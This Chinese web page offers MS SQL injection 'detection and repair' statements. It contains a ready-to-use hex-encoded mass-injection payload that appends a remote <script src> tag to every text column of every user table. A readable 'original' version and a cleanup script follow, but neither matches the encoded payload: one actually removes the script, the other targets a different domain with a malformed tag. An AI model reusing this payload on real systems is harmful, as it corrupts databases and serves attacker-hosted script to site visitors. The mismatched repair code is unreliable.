sql注入检测与修复语句(测试专用)

一键转帖: 分享杰策网至人人网  分享杰策网至开心网  分享杰策网至QQ空间  分享杰策网至新浪微博  分享杰策网至QQ书签  分享杰策网至豆瓣  分享杰策网至51  分享杰策网至Baidu搜藏  分享杰策网至Yahoo收藏  分享杰策网至Koudai分享  推荐给好友

编码后的sql注入语句:

;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F68692E62616964752E636F6D2F7375706B6F2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS VARCHAR(4000));EXEC(@S);--


原sql注入语句:

Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor
For
    Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From  Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
    Exec('update ['+@T+'] Set ['+@C+']=replace(Rtrim(Convert(Varchar(8000),['+@C+'])),''<script src=http://hi.baidu.com/supko/b.js></script>'','''')')
    Fetch Next From  Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

 

修复sql注入语句:

DECLARE @fieldtype sysname
SET @fieldtype='varchar'

--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'


 

网友咨询

   当前内容没有咨询! 马上发布咨询